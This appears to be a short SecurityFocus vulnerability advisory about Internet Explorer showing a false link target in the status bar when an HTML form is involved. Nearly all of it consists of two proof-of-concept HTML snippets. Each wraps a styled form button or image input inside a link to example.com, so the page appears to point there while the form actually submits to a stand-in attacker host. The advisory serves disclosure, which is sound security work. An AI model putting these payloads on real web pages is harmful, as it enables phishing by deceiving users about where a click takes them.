Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability

The following proof of concepts have been provided:
<A
href="http://www.example.com">
<FORM action=http://www.malicious.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value=http://www.example.com>
</A>

<form action="http://www.malicious.com/" method="get">
<a href="http://www.example.com/"><input type="image" src="http://images.example.com/title.gif"></a>
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus